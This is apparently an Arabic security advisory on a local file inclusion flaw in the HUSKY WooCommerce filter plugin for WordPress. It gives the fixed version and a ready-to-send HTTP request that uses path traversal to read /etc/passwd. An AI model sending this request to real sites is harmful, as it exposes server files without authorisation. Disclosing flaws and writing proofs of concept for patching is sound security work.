
HUSKY – Products Filter Professional for WooCommerce هي إضافة لنظام ووردبريس معرضة لثغرة تضمين الملفات المحلية (LFI)
إضافة HUSKY – Products Filter Professional for WooCommerce في ووردبريس معرضة لثغرة تضمين الملفات المحلي (LFI) في جميع الإصدارات حتى 1.3.6.5 من خلال معامل template في إجراء AJAX باسم woof_text_search.
يتيح ذلك للمهاجمين غير المصادق عليهم تضمين وتنفيذ ملفات عشوائية على الخادم، الأمر الذي قد يؤدي إلى:
<= 1.3.6.51.3.6.6قم بالتحديث إلى الإصدار 1.3.6.6 أو أي إصدار أحدث يحتوي على التصحيح.
POST /wp-admin/admin-ajax.php?template=../../../../../../../etc/passwd&value=a&min_symbols=1 HTTP/1.1
Host: TARGET_SITE_HERE
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: YOUR_SESSION_COOKIE_HERE
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
action=woof_text_search&
4. إذا نجح الاستغلال، سيعيد الخادم محتويات ملف /etc/passwd.
5. يمكن استخدام ذلك لاستخراج ملفات حساسة أخرى من الخادم.
إثبات المفهوم (PoC) هذا مخصص لأغراض تعليمية وبحثية فقط. إن الاختبار غير المصرح به للأنظمة دون إذن يعد أمرًا غير قانوني وغير أخلاقي. احرص دائمًا على الحصول على تفويض صريح قبل إجراء أي اختبار أمني.